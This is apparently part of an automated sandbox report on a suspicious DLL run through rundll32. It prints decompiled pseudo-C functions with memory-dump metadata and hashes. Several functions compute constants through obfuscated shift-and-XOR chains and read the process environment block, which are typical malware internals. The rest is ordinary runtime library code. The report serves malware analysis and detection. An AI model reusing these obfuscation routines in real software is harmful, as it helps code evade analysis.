                                                                                                                          						_v8 = _v8 >> 4;
                                                                                                                          						_v8 = _v8 ^ 0x0f1cf547;
                                                                                                                          						_v12 =  *_t82;
                                                                                                                          						_v12 = _v12 + (_v12 << _v8);
                                                                                                                          						_v12 = _v12 + (_v12 << _v8);
                                                                                                                          						_v12 = _v12 - _v12;
                                                                                                                          						_t82 = _t82 + 1;
                                                                                                                          						_t84 = 0x11;
                                                                                                                          					} while ( *_t82 != 0);
                                                                                                                          				}
                                                                                                                          				return _v12;
                                                                                                                          			}













                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                          • Instruction ID: 20515d2192786a14aac6848d8a8d595488d8d97de1bb1d05443f7f06c35582b5
                                                                                                                          • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                          • Instruction Fuzzy Hash: 68311171D02348EBDF06DFA8CA4A2DEBBB0EF45314F208099D501A7265D3B14B98EF40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00799011(void* __ecx, signed int __edx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				intOrPtr _t75;
                                                                                                                          				intOrPtr _t80;
                                                                                                                          				signed int _t88;
                                                                                                                          				signed int _t89;
                                                                                                                          
                                                                                                                          				_v40 = _v40 & 0x00000000;
                                                                                                                          				_v44 = 0xa2b624;
                                                                                                                          				_v8 = 0x99eb9;
                                                                                                                          				_t88 = __edx;
                                                                                                                          				_v8 = _v8 * 0x25;
                                                                                                                          				_v8 = _v8 | 0x30e9a4b5;
                                                                                                                          				_v8 = _v8 << 5;
                                                                                                                          				_v8 = _v8 ^ 0x3d7f3aa0;
                                                                                                                          				_v24 = 0x77b72d;
                                                                                                                          				_v24 = _v24 << 1;
                                                                                                                          				_v24 = _v24 ^ 0x00e56894;
                                                                                                                          				_v20 = 0x2ce6cf;
                                                                                                                          				_v20 = _v20 >> 6;
                                                                                                                          				_v20 = _v20 ^ 0x000f2bb3;
                                                                                                                          				_v32 = 0xab4cd;
                                                                                                                          				_v32 = _v32 >> 0xc;
                                                                                                                          				_v32 = _v32 ^ 0x0007aa85;
                                                                                                                          				_v28 = 0x1f3eea;
                                                                                                                          				_v28 = _v28 >> 9;
                                                                                                                          				_v28 = _v28 ^ 0x0004326d;
                                                                                                                          				_v12 = 0xc1e4f9;
                                                                                                                          				_v12 = _v12 ^ 0x329f08e7;
                                                                                                                          				_v12 = _v12 + 0xcc91;
                                                                                                                          				_v12 = _v12 >> 8;
                                                                                                                          				_v12 = _v12 ^ 0x0038f912;
                                                                                                                          				_v16 = 0x3b10d4;
                                                                                                                          				_t89 = 0x6f;
                                                                                                                          				_v16 = _v16 / _t89;
                                                                                                                          				_v16 = _v16 + 0xffff4357;
                                                                                                                          				_v16 = _v16 ^ 0xf8ba2c27;
                                                                                                                          				_v16 = _v16 ^ 0x074e6031;
                                                                                                                          				_v36 = 0x1364c3;
                                                                                                                          				_v36 = _v36 + 0x503c;
                                                                                                                          				_v36 = _v36 ^ 0x001cba9a;
                                                                                                                          				_push(_v20);
                                                                                                                          				_push(_v24);
                                                                                                                          				_t75 = E007A5BFD(_v32, _v28, _v12, E007ADCF7(_v8, __ecx, _v36));
                                                                                                                          				_t80 =  *0x7b3df8; // 0x0
                                                                                                                          				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
                                                                                                                          				return E0079A8B0(_v16, _t74, _v36);
                                                                                                                          			}


















                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dab809eb0228b9e3ee1476b45b4bf6bf9e051718e501e8acbc6afe66837f5214
                                                                                                                          • Instruction ID: d90eefc36516a1db2c397776587298c4a328bba2bffa31d27c0319895e6239cf
                                                                                                                          • Opcode Fuzzy Hash: dab809eb0228b9e3ee1476b45b4bf6bf9e051718e501e8acbc6afe66837f5214
                                                                                                                          • Instruction Fuzzy Hash: 4931E171D0121DEBCF48DFA5D94A4EEBBB1FF84318F208198D421B6250D7B90A59DF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00797FF2(void* __edx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				unsigned int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				signed int _t67;
                                                                                                                          				void* _t73;
                                                                                                                          
                                                                                                                          				_v32 = _v32 & 0x00000000;
                                                                                                                          				_v40 = 0xdad9ef;
                                                                                                                          				_v36 = 0x9bb390;
                                                                                                                          				_v28 = 0x653306;
                                                                                                                          				_v28 = _v28 + 0xffff1628;
                                                                                                                          				_v28 = _v28 >> 3;
                                                                                                                          				_v28 = _v28 ^ 0x000c892d;
                                                                                                                          				_v12 = 0x5dd1e8;
                                                                                                                          				_v12 = _v12 ^ 0xb170c383;
                                                                                                                          				_v12 = _v12 | 0x2785cc64;
                                                                                                                          				_v12 = _v12 >> 5;
                                                                                                                          				_v12 = _v12 ^ 0x05b45dea;
                                                                                                                          				_v8 = 0x56f6d9;
                                                                                                                          				_v8 = _v8 + 0xc121;
                                                                                                                          				_t73 = __edx;
                                                                                                                          				_t67 = 0x41;
                                                                                                                          				_v8 = _v8 / _t67;
                                                                                                                          				_v8 = _v8 << 7;
                                                                                                                          				_v8 = _v8 ^ 0x00a76089;
                                                                                                                          				_v24 = 0xf5edfd;
                                                                                                                          				_v24 = _v24 | 0x2f446a90;
                                                                                                                          				_v24 = _v24 ^ 0x7c479bdf;
                                                                                                                          				_v24 = _v24 ^ 0x53b1dfb9;
                                                                                                                          				_v20 = 0xafa903;
                                                                                                                          				_v20 = _v20 + 0xffff9fdf;
                                                                                                                          				_v20 = _v20 ^ 0xafba618c;
                                                                                                                          				_v20 = _v20 ^ 0xaf136809;
                                                                                                                          				_v16 = 0x74f1b4;
                                                                                                                          				_v16 = _v16 >> 7;
                                                                                                                          				_v16 = _v16 | 0x7bde77db;
                                                                                                                          				_v16 = _v16 ^ 0x7bddce28;
                                                                                                                          				return E00791E22(_v28, _v24, _t73, E00791DB9(_t67), _v20, _v16);
                                                                                                                          			}















                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                          • Instruction ID: 77a4aba6872385e8bea765801ca1df79acba3eb2714e9143d94b5d33e2712cad
                                                                                                                          • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                          • Instruction Fuzzy Hash: B421EDB2D0131EEBCB48DFE5D94A4EEFBB0BB10314F208189D512B2264C3B40B998F91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E007A4087() {
                                                                                                                          
                                                                                                                          				return  *[fs:0x30];
                                                                                                                          			}




                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E10014DA8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int _t73;
                                                                                                                          				struct HINSTANCE__* _t78;
                                                                                                                          				_Unknown_base(*)()* _t79;
                                                                                                                          				struct HINSTANCE__* _t81;
                                                                                                                          				signed int _t92;
                                                                                                                          				signed int _t94;
                                                                                                                          				unsigned int _t97;
                                                                                                                          				void* _t113;
                                                                                                                          				unsigned int _t115;
                                                                                                                          				signed short _t123;
                                                                                                                          				unsigned int _t124;
                                                                                                                          				_Unknown_base(*)()* _t131;
                                                                                                                          				signed short _t133;
                                                                                                                          				unsigned int _t134;
                                                                                                                          				intOrPtr _t143;
                                                                                                                          				void* _t144;
                                                                                                                          				int _t145;
                                                                                                                          				int _t146;
                                                                                                                          				signed int _t164;
                                                                                                                          				void* _t167;
                                                                                                                          				signed int _t169;
                                                                                                                          				void* _t170;
                                                                                                                          				int _t172;
                                                                                                                          				signed int _t176;
                                                                                                                          				void* _t177;
                                                                                                                          				CHAR* _t181;
                                                                                                                          				void* _t183;
                                                                                                                          				void* _t184;
                                                                                                                          
                                                                                                                          				_t167 = __edx;
                                                                                                                          				_t184 = _t183 - 0x118;
                                                                                                                          				_t181 = _t184 - 4;
                                                                                                                          				_t73 =  *0x100545cc; // 0x986eb69
                                                                                                                          				_t181[0x118] = _t73 ^ _t181;
                                                                                                                          				_push(0x58);
                                                                                                                          				E10030D27(E10043F3E, __ebx, __edi, __esi);
                                                                                                                          				_t169 = 0;
                                                                                                                          				 *(_t181 - 0x40) = _t181[0x124];
                                                                                                                          				 *(_t181 - 0x14) = 0;
                                                                                                                          				 *(_t181 - 0x10) = 0;
                                                                                                                          				_t78 = GetModuleHandleA("kernel32.dll");
                                                                                                                          				 *(_t181 - 0x18) = _t78;
                                                                                                                          				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                                                                                          				if(_t79 == 0) {
                                                                                                                          					if(GetVersion() >= 0) {
                                                                                                                          						_t81 = GetModuleHandleA("ntdll.dll");
                                                                                                                          						if(_t81 != 0) {
                                                                                                                          							 *(_t181 - 0x14) = 0;
                                                                                                                          							EnumResourceLanguagesA(_t81, 0x10, 1, E10014522, _t181 - 0x14);
                                                                                                                          							if( *(_t181 - 0x14) != 0) {
                                                                                                                          								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                                                                                          								_t145 = _t97 & 0x3ff;
                                                                                                                          								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                                                                                          								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
                                                                                                                          								 *(_t181 - 0x10) = 2;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						 *(_t181 - 0x18) = 0;
                                                                                                                          						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                                                                                          							 *(_t181 - 0x44) = 0x10;
                                                                                                                          							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                                                                                          								_t113 = E100312A0( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                                                                                          								_t184 = _t184 + 0xc;
                                                                                                                          								if(_t113 == 1) {
                                                                                                                          									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                          									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                                                                                          									_t146 = _t115 & 0x3ff;
                                                                                                                          									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                                                                                          									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
                                                                                                                          									 *(_t181 - 0x10) = 2;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							RegCloseKey( *(_t181 - 0x18));
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t123 =  *_t79() & 0x0000ffff;
                                                                                                                          					 *(_t181 - 0x14) = _t123;
                                                                                                                          					_t124 = _t123 & 0x0000ffff;
                                                                                                                          					_t164 = _t124 & 0x3ff;
                                                                                                                          					 *(_t181 - 0x1c) = _t164;
                                                                                                                          					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
                                                                                                                          					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
                                                                                                                          					 *(_t181 - 0x10) = 2;
                                                                                                                          					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                                                                                          					if(_t131 != 0) {
                                                                                                                          						_t133 =  *_t131() & 0x0000ffff;
                                                                                                                          						 *(_t181 - 0x14) = _t133;
                                                                                                                          						_t134 = _t133 & 0x0000ffff;
                                                                                                                          						_t172 = _t134 & 0x3ff;
                                                                                                                          						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                                                                                          						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                                                                                          						 *(_t181 - 0x10) = 4;
                                                                                                                          					}
                                                                                                                          					_t169 = 0;
                                                                                                                          				}
                                                                                                                          				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                                                                                          				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                                                                                          				_t181[0x105] = 0;
                                                                                                                          				_t181[0x104] = 0;
                                                                                                                          				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
                                                                                                                          					_t143 = 0x20;
                                                                                                                          					E10030030(_t169, _t181 - 0x64, _t169, _t143);
                                                                                                                          					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                                                                                          					 *(_t181 - 0x5c) = _t181;
                                                                                                                          					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                                                                                          					 *(_t181 - 0x48) = 0x10000000;
                                                                                                                          					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                                                                                          					E10014538(_t181 - 0x3c, 0xffffffff);
                                                                                                                          					 *(_t181 - 4) = _t169;
                                                                                                                          					if(E100145E8(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                                                                                          						E1001461E(_t181 - 0x3c);
                                                                                                                          					}
                                                                                                                          					_t176 = 0;
                                                                                                                          					if( *(_t181 - 0x10) <= _t169) {
                                                                                                                          						L23:
                                                                                                                          						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                                                                                          						E10014C3E(_t181 - 0x3c);
                                                                                                                          						_t92 = _t169;
                                                                                                                          						goto L24;
                                                                                                                          					} else {
                                                                                                                          						while(1) {
                                                                                                                          							_t94 = E10014B71( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]);
                                                                                                                          							if(_t94 != _t169) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t176 =  &(1[_t176]);
                                                                                                                          							if(_t176 <  *(_t181 - 0x10)) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							goto L23;
                                                                                                                          						}
                                                                                                                          						_t169 = _t94;
                                                                                                                          						goto L23;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_t92 = 0;
                                                                                                                          					L24:
                                                                                                                          					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                                                                                          					_pop(_t170);
                                                                                                                          					_pop(_t177);
                                                                                                                          					_pop(_t144);
                                                                                                                          					return E1002F81E(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                                                                                          				}
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                          • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                          • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                          • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                          • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                          • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                          • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                          • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                          • _memset.LIBCMT ref: 10014FF3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                          • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                          • API String ID: 434808117-483790700
                                                                                                                          • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                          • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                          • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                          • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E1002E129(intOrPtr* __ecx) {
                                                                                                                          				intOrPtr* _t27;
                                                                                                                          
                                                                                                                          				_t27 = __ecx;
                                                                                                                          				 *_t27 = RegisterClipboardFormatA("Native");
                                                                                                                          				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
                                                                                                                          				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
                                                                                                                          				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                                                                                                                          				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                                                                                                                          				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
                                                                                                                          				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                                                                                                                          				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                                                                                                                          				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
                                                                                                                          				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                                                                                                                          				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                                                                                                                          				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                                                                                                                          				return _t27;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                          • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                          • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                          • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                          • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                          • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                          • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                          • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                          • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                          • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                          • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                          • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardFormatRegister
                                                                                                                          • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                          • API String ID: 1228543026-2889995556
                                                                                                                          • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                          • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                          • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                          • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E1003548E(void* __ebx, void* __edx) {
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				_Unknown_base(*)()* _t7;
                                                                                                                          				long _t10;
                                                                                                                          				void* _t11;
                                                                                                                          				int _t12;
                                                                                                                          				void* _t18;
                                                                                                                          				intOrPtr _t21;
                                                                                                                          				long _t26;
                                                                                                                          				void* _t30;
                                                                                                                          				void* _t37;
                                                                                                                          				struct HINSTANCE__* _t38;
                                                                                                                          				void* _t41;
                                                                                                                          				void* _t43;
                                                                                                                          
                                                                                                                          				_t37 = __edx;
                                                                                                                          				_t30 = __ebx;
                                                                                                                          				_t38 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                          				if(_t38 != 0) {
                                                                                                                          					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
                                                                                                                          					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
                                                                                                                          					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
                                                                                                                          					_t7 = GetProcAddress(_t38, "FlsFree");
                                                                                                                          					__eflags =  *0x10057934;
                                                                                                                          					_t41 = TlsSetValue;
                                                                                                                          					 *0x10057940 = _t7;
                                                                                                                          					if( *0x10057934 == 0) {
                                                                                                                          						L6:
                                                                                                                          						 *0x10057938 = TlsGetValue;
                                                                                                                          						 *0x10057934 = E10035111;
                                                                                                                          						 *0x1005793c = _t41;
                                                                                                                          						 *0x10057940 = TlsFree;
                                                                                                                          					} else {
                                                                                                                          						__eflags =  *0x10057938;
                                                                                                                          						if( *0x10057938 == 0) {
                                                                                                                          							goto L6;
                                                                                                                          						} else {
                                                                                                                          							__eflags =  *0x1005793c;
                                                                                                                          							if( *0x1005793c == 0) {
                                                                                                                          								goto L6;
                                                                                                                          							} else {
                                                                                                                          								__eflags = _t7;
                                                                                                                          								if(_t7 == 0) {
                                                                                                                          									goto L6;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t10 = TlsAlloc();
                                                                                                                          					__eflags = _t10 - 0xffffffff;
                                                                                                                          					 *0x100547c8 = _t10;
                                                                                                                          					if(_t10 == 0xffffffff) {
                                                                                                                          						L15:
                                                                                                                          						_t11 = 0;
                                                                                                                          						__eflags = 0;
                                                                                                                          					} else {
                                                                                                                          						_t12 = TlsSetValue(_t10,  *0x10057938);
                                                                                                                          						__eflags = _t12;
                                                                                                                          						if(_t12 == 0) {
                                                                                                                          							goto L15;
                                                                                                                          						} else {
                                                                                                                          							E100310CD();
                                                                                                                          							 *0x10057934 = E10035042( *0x10057934);
                                                                                                                          							 *0x10057938 = E10035042( *0x10057938);
                                                                                                                          							 *0x1005793c = E10035042( *0x1005793c);
                                                                                                                          							 *0x10057940 = E10035042( *0x10057940);
                                                                                                                          							_t18 = E10035923();
                                                                                                                          							__eflags = _t18;
                                                                                                                          							if(_t18 == 0) {
                                                                                                                          								L14:
                                                                                                                          								E10035178(_t37);
                                                                                                                          								goto L15;
                                                                                                                          							} else {
                                                                                                                          								_push(E10035304);
